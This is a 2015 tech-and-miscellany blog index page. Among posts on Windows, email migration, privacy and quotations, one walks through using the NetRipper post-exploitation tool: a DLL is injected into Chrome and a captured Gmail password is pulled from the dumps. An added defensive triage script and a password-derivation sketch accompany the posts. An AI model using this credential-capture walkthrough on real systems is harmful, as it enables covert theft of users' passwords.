tinyapps.org / blog


Change the Windows 7 interface language #

Vistalizator is a portable app that helps you change the display language in any version of Windows Vista or 7 (inexplicably, Microsoft normally restricts this ability to Ultimate or Enterprise editions). Links to necessary MUI (Multilingual User Interface) files hosted at Microsoft and steps for creating a multi-language Windows DVD are also provided.

/windows | Aug 25, 2015

Sniffing encrypted traffic #

Fiddler ("The free web debugging proxy for any browser, system or platform") has long been used for sniffing encrypted web traffic, but it requires full administrator access to install an untrusted root certificate for decryption to work (Tools > Fiddler Options... > HTTPS > etc.) and the .NET Framework to run.

NetRipper ("Smart traffic sniffing for penetration testers") requires neither. It is "a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption." Further, "NetRipper should be able to capture network traffic from: Putty, WinSCP, SQL Server Management Studio, Lync (Skype for Business), Microsoft Outlook, Google Chrome, Mozilla Firefox. The list is not limited to these applications but other tools may require special support."

Here's a simple example of it in action:
  1. Launch Google Chrome
  2. Open cmd.exe (no need for elevated command prompt), cd to the NetRipper directory and run:
    C:\Release>NetRipper.exe DLL.dll chrome.exe
    Trying to inject DLL.dll in chrome.exe
    Reflective injected in: 2880
    Reflective injected in: 2992
    Reflective injected in: 3096
  3. Log in to a Gmail account in Chrome
  4. NetRipper saves data to %temp%\NetRipper by default (on most systems, this will be C:\Users\username\AppData\Local\Temp\NetRipper):
    C:\Release>dir %temp%\NetRipper /B
    2880_chrome.exe_recv.txt
    2880_chrome.exe_SSL_Read.txt
    2880_chrome.exe_SSL_Write.txt
    2880_chrome.exe_StringFinder.txt
    2880_chrome.exe_WSASend.txt
    NetRipperLog.txt
  5. Search for the string "Passwd":
    C:\Release>findstr Passwd %temp%\NetRipper\2880_chrome.exe_SSL_Write.txt
    ...Email=tinyapps%40gmail.com&Passwd=PASSWORD_IN_PLAIN_TEXT_SHOWN_HERE&PersistentCookie=yes&signIn=...
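
For incident response, the dump directory from step 4 is itself an indicator. The following added example (not from the original post or the NetRipper project) walks such a directory, groups files by the PID and process in their names, and lists the accounts whose credentials appear in captured form bodies. The sample files and the `SECRET_FIELDS` list are constructed assumptions.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import parse_qsl

# Naming pattern from the listing above: <pid>_<process>_<hooked function>.txt
ARTIFACT = re.compile(r"^(?P<pid>\d+)_(?P<proc>.+?\.exe)_(?P<hook>\w+)\.txt$", re.I)
# Runs of key=value&key=value, as in the captured form body
FORM = re.compile(r"[\w-]+=[^&\s]*(?:&[\w-]+=[^&\s]*)+")
# Field names treated as credentials (assumed list; extend for your applications)
SECRET_FIELDS = {"passwd", "password", "pwd"}


def triage(dump_dir):
    """Map (pid, process) -> hooked functions seen and accounts whose secrets were captured."""
    report = {}
    for path in sorted(Path(dump_dir).iterdir()):
        m = ARTIFACT.match(path.name)
        if not m:
            continue  # NetRipperLog.txt and unrelated files
        entry = report.setdefault((int(m["pid"]), m["proc"].lower()),
                                  {"hooks": [], "exposed": set()})
        entry["hooks"].append(m["hook"])
        for body in FORM.findall(path.read_text(errors="replace")):
            fields = {k.lower(): v for k, v in parse_qsl(body, keep_blank_values=True)}
            if SECRET_FIELDS & set(fields):
                # Record the account to reset, never the captured secret itself
                entry["exposed"].add(fields.get("email", "<unknown account>"))
    return report


def build_sample(dump_dir):
    """Constructed sample mirroring the file names in the post; contents are made up."""
    files = {
        "2880_chrome.exe_SSL_Write.txt":
            "POST /login HTTP/1.1\n\nEmail=user%40example.test&Passwd=CONSTRUCTED&signIn=1\n",
        "2880_chrome.exe_SSL_Read.txt": "HTTP/1.1 200 OK\n",
        "2992_chrome.exe_recv.txt": "",
        "NetRipperLog.txt": "constructed log line\n",
    }
    for name, text in files.items():
        (Path(dump_dir) / name).write_text(text)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        build_sample(d)
        for (pid, proc), info in triage(d).items():
            print(pid, proc, info["hooks"], sorted(info["exposed"]))
```

Every account the report lists should have its password reset and its sessions revoked, because the secret was written to disk in clear text.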

/windows | Aug 15, 2015

Migrating email from Windows Live Mail (eml) to Apple Mail (mbox) #

  1. Install Thunderbird
  2. Open Thunderbird and cancel the automatic setup
  3. Install ImportExportTools
  4. File > Offline > Work Offline
  5. Tools > Account Settings > Account Actions > Add Mail Account... > enter any name, address, and password > Continue > Advanced config > OK
  6. Select the Inbox folder in the left-hand pane
  7. Tools > ImportExportTools > Import all messages from a directory > also from its subdirectories > browse to Windows Live Mail top folder (e.g., C:\Users\user\AppData\Local\Microsoft\Windows Live Mail) > Select Folder
  8. The import process will begin and progress will be displayed in the status bar at bottom
  9. Tools > ImportExportTools > Options > Export directories > check "Export folders as MBOX file" and select a destination directory > OK
  10. Select the desired top mail folder in Thunderbird
  11. Tools > ImportExportTools > Export folder with subfolders (with structure)
  12. The export process will begin. Unlike the import process, progress is not displayed.
  13. When the export is complete, copy the exported data to the Mac and import into Mail (File > Import Mailboxes... > Thunderbird > etc.)

/windows | Aug 12, 2015

"Desire, at the end, was a malady" #

Desire, at the end, was a malady, or a madness, or both. I grew careless of the lives of others. I took pleasure where it pleased me, and passed on. I forgot that every little action of the common day makes or unmakes character, and that therefore what one has done in the secret chamber one has some day to cry aloud on the housetop. I ceased to be lord over myself. I was no longer the captain of my soul, and did not know it. I allowed pleasure to dominate me. I ended in horrible disgrace. There is only one thing for me now, absolute humility.

. . .

I said . . . that there was enough suffering in one narrow London lane to show that God did not love man, and that wherever there was any sorrow, though but that of a child, in some little garden weeping over a fault that it had or had not committed, the whole face of creation was completely marred. I was entirely wrong. . . . Now it seems to me that love of some kind is the only possible explanation of the extraordinary amount of suffering that there is in the world. I cannot conceive of any other explanation. I am convinced that there is no other, and that if the world has indeed, as I have said, been built of sorrow, it has been built by the hands of love, because in no other way could the soul of man, for whom the world was made, reach the full stature of its perfection.
From De Profundis by Oscar Wilde

/misc | Aug 07, 2015

"Pleasure passes, but dishonor remains." #

When I was still a boy at school, I heard that this Greek saying, which I here set down, was uttered by Musonius the philosopher, and because the sentiment is true and striking as well as neatly and concisely rounded out, I was very happy to commit it to memory. "If one accomplishes some good though with toil, the toil passes, but the good remains; if one does something dishonorable with pleasure, the pleasure passes, but the dishonor remains."

Afterwards I read that same sentiment in a speech of Cato's which was delivered at Numantia to the knights. Although it is expressed a little less compactly and concisely as compared with the Greek which I have quoted, yet because it is earlier and more ancient, it may well seem more impressive. The words from his speech are the following: "Consider this in your hearts: if you accomplish some good attended with toil, the toil will quickly leave you; but if you do some evil attended with pleasure, the pleasure will quickly pass away, but the bad deed will remain with you always."
From Musonius Rufus: The Roman Socrates by Cora E. Lutz. Printed in Yale Classical Studies, Volume X (1947). Electronic text can be found here and here.

/misc | Aug 03, 2015

Windows 10: Privacy nightmare #

July 29 - the big Windows 10 release day. Rather than trying an unreliable workaround that was making the rounds, I followed RiotShielder's advice and downloaded an ISO from Microsoft, installing over a Windows 8.1 virtual machine (because you must upgrade your existing Windows OS to get a valid Windows 10 key before doing a clean install (recover the key with Nir's ProduKey)).

When installation completes, be sure to click the tiny "Customize" link on the "Get going fast" screen; you may (not) be surprised at how invasive Microsoft has become. Here's a taste (these are all enabled by default):

  1. "Personalize your speech, typing, and inking input by sending contacts and calendar details, along with other associated input data to Microsoft."
  2. "Send typing and inking data to Microsoft to improve the recognition and suggestion platform."
  3. "Use page prediction to improve reading, speed up browsing, and make your overall experience better in Windows browsers. Your browsing data will be sent to Microsoft."
  4. "Automatically connect to suggested open hotspots. Not all networks are secure."
  5. "Automatically connect to networks shared by your contacts."
  6. "Send error and diagnostic information to Microsoft." (The toggle switch to enable or disable was hidden below the screen; a near-invisible scroll bar was required to view it.)

Number five apparently refers to Wi-Fi (Non)Sense, which Claus covered in some detail.

Much more about the mounting privacy problems in Windows 10 from Heini Järvinen:

By default, when signing into Windows with a Microsoft account, Windows syncs some of your settings and data with Microsoft servers, for example "web browser history, favorites, and websites you have open" as well as "saved app, website, mobile hotspot, and Wi-Fi network names and passwords". Users can however deactivate this transfer to the Microsoft servers by changing their settings.

More problematic from a data protection perspective is however the fact that Windows generates a unique advertising ID for each user on a device. This advertising ID can be used by third parties, such as app developers and advertising networks for profiling purposes.

Also, when device encryption is on, Windows automatically encrypts the drive Windows is installed on and generates a recovery key. The BitLocker recovery key for the user’s device is automatically backed up online in the Microsoft OneDrive account.

Microsoft’s updated terms also state that they collect basic information "from you and your devices, including for example "app use data for apps that run on Windows" and "data about the networks you connect to."

Users who chose to enable Microsoft’s personal assistant software "Cortana" have to live with the following invasion to their privacy: "To enable Cortana to provide personalized experiences and relevant suggestions, Microsoft collects and uses various types of data, such as your device location, data from your calendar, the apps you use, data from your emails and text messages, who you call, your contacts and how often you interact with them on your device. Cortana also learns about you by collecting data about how you use your device and other Microsoft services, such as your music, alarm settings, whether the lock screen is on, what you view and purchase, your browse and Bing search history, and more." But this is not all, as this piece of software also analyses undefined "speech data": "we collect your voice input, as well your name and nickname, your recent calendar events and the names of the people in your appointments, and information about your contacts including names and nicknames."

But Microsoft’s updated privacy policy is not only bad news for privacy. Your free speech rights can also be violated on an ad hoc basis as the company warns:

"We will access, disclose and preserve personal data, including your content (such as the content of your emails, other private communications or files in private folders), when we have a good faith belief that doing so is necessary to", for example, "protect their customers" or "enforce the terms governing the use of the services".

At the very least, be sure to create a local account and customize the privacy settings after installation. Better yet, migrate to a truly free operating system; Richard Stallman was right all along.

/windows | Jul 29, 2015

"What else do _you_ do?" #

ZAPHOD BEEBLEBROX: . . . [W]hat's your name?
MAN: I don't know. Why, do you think I ought to have one? It seems odd to give a bundle of vague sensory perceptions a name.
ZARNIWOOP: Listen. We must ask you some questions.
. . .
ZARNIWOOP: How long have you been ruling the Universe?
MAN: Ah, this is a question about the past is it?
ZARNIWOOP: Yes.
MAN: How can I tell that the past isn't a fiction designed to account for the discrepancy between my immediate physical sensations and my state of mind?
ZARNIWOOP: Do you answer all questions like this?
MAN: I say what it occurs to me to say when I think I hear people say things. More I cannot say.
. . .
ZARNIWOOP: People come to you, yes?
MAN: I think so.
ZARNIWOOP: And they ask you to take decisions—about wars, about economies, about people, about everything going on out there in the Universe?
MAN: I only decide about my Universe. My Universe is what happens to my eyes and ears. Anything else is surmise and hearsay. For all I know, these people may not exist. You may not exist. I say what it occurs to me to say.
ZARNIWOOP: But don't you see? What you decide affects the fate of millions of people.
MAN: I don't know them, I've never met them. They only exist in words I think I hear.
. . .
MAN: But it's folly to say you know what is happening to other people. Only they know. If they exist.
ZARNIWOOP: Do you think they do?
MAN: I have no opinion. How can I have?
. . .
ZARNIWOOP: But don't you see that people live or die on your word?
MAN: It's nothing to do with me, I am not involved with people. The Lord knows I am not a cruel man.
ZARNIWOOP: Ah! You say... the Lord! So, you believe in...
MAN: My cat. I call him the Lord. I am kind to him.
ZARNIWOOP: All right. How do you know he exists? How do you know he knows you to be kind, or enjoys what you think of as your kindness?
MAN: I don't. I have no idea. It merely pleases me to behave in a certain way to what appears to be a cat. What else do you do? . . .

From Douglas Adams' The Hitchhiker's Guide to the Galaxy: Secondary Phase (Original BBC Radio Series). See also The Original Hitchhiker Radio Scripts: 10th Anniversary Edition and The Hitchhiker's Guide To The Galaxy: The Complete Radio Series.

/misc | Jul 19, 2015

Download Flash videos #

(including those embedded in JW Player) with the Grab Any Media extension for Google Chrome. Installation and usage instructions. Piracy PSA.

/misc | Jul 17, 2015

Air travel essentials for long flights #

| Item | Purpose | Rating | Comment |
|---|---|---|---|
| Bose QuietComfort 20i Acoustic Noise Cancelling Headphones | Avoid noise fatigue | +++++ | Next to water, the single most important in-flight item in my opinion. |
| Flight Spray | Avoid dry nose | ++++ | Much more effective than the damp washcloth I used formerly. |
| No-Jet-Lag | "For the relief of tiredness and jet lag associated with flying" | ? | Despite taking as directed, not really sure if this had any effect, though there are plenty of positive reviews on Amazon. |
| Source Naturals NADH 20mg | "Helps relieve drowsiness and restores alertness and energy" | ++++ | Definitely seemed to help keep me awake when needed. |
| Herbatonin 3mg Plant Melatonin | "Helps support normal sleep patterns when disrupted by travel and changing time zones" | ++++ | Definitely seemed to help get me to sleep when needed. |
| Vitalsox Graduated Compression Socks | Possibly help prevent Deep Vein Thrombosis and Pulmonary Embolism | ? | Did not really feel any difference, but also did not develop DVT (not that I ever have). |
| Memory Foam Neck Pillow | Doze in relative comfort | - | Despite hours of research (and a slew of positive reviews on Amazon), this did not work for me at all - gave away after landing. The vast majority of reviews are overwhelmingly positive, however. |
| Water | Avoid dehydration (and in-flight meals) | +++++ | A must. |

/misc | Jun 26, 2015

Time to replace traditional password managers like KeePass, 1Password, LastPass, et al.? #

"Master Password is a stateless password generator. It doesn't store, collect or transmit any secrets. It makes them ubiquitously available, on-demand, depends on nothing but your private master password, and is fully open source.

How Does It Work?

The user is expected to remember the following information:

In practice, the secret master password is the only extra thing users will actually need to remember. Their full name, they'll hopefully remember regardless. If the site is always named after the bare domain name, it needn't explicitly be remembered but can be found in the browser's address bar. The counter and type need only be remembered if they are changed from their default values."
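
To make "stateless" concrete, the following added example (not Master Password's own algorithm or code) derives a site password from the inputs named in the quote: full name, master password, site name, counter and type. The KDF parameters, message layout and character set are assumptions chosen for illustration.

```python
import hashlib
import hmac

# 64 unambiguous characters, so one seed byte maps to one character without modulo bias.
# The character set, KDF parameters and message layout are assumptions for illustration.
ALPHABET = ("ABCDEFGHJKLMNPQRSTUVWXYZ" "abcdefghijkmnopqrstuvwxyz" "23456789" "!@#$%&*")


def master_key(full_name, master_password):
    """Stretch the master password into a key, salted with the user's full name."""
    return hashlib.scrypt(master_password.encode(), salt=full_name.encode(),
                          n=2**14, r=8, p=1, dklen=64)


def site_password(key, site, counter=1, kind="long"):
    """Recompute the password for a site from the key alone; nothing is stored."""
    # Length-prefix the site so a name containing the separator cannot collide
    msg = f"{kind}|{len(site)}|{site}|{counter}".encode()
    seed = hmac.new(key, msg, hashlib.sha256).digest()
    if kind == "pin":
        return f"{int.from_bytes(seed, 'big') % 10**4:04d}"
    if kind == "long":
        return "".join(ALPHABET[b % 64] for b in seed[:16])
    raise ValueError(f"unknown password type: {kind}")


if __name__ == "__main__":
    key = master_key("Constructed User", "constructed master password")
    print(site_password(key, "example.test"))
    print(site_password(key, "example.test", counter=2))  # rotated password
    print(site_password(key, "example.test", kind="pin"))
```

Because every site password is a pure function of the master password, a compromise of that one secret exposes all of them, and changing it changes every derived password at once.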

/misc | Jun 26, 2015

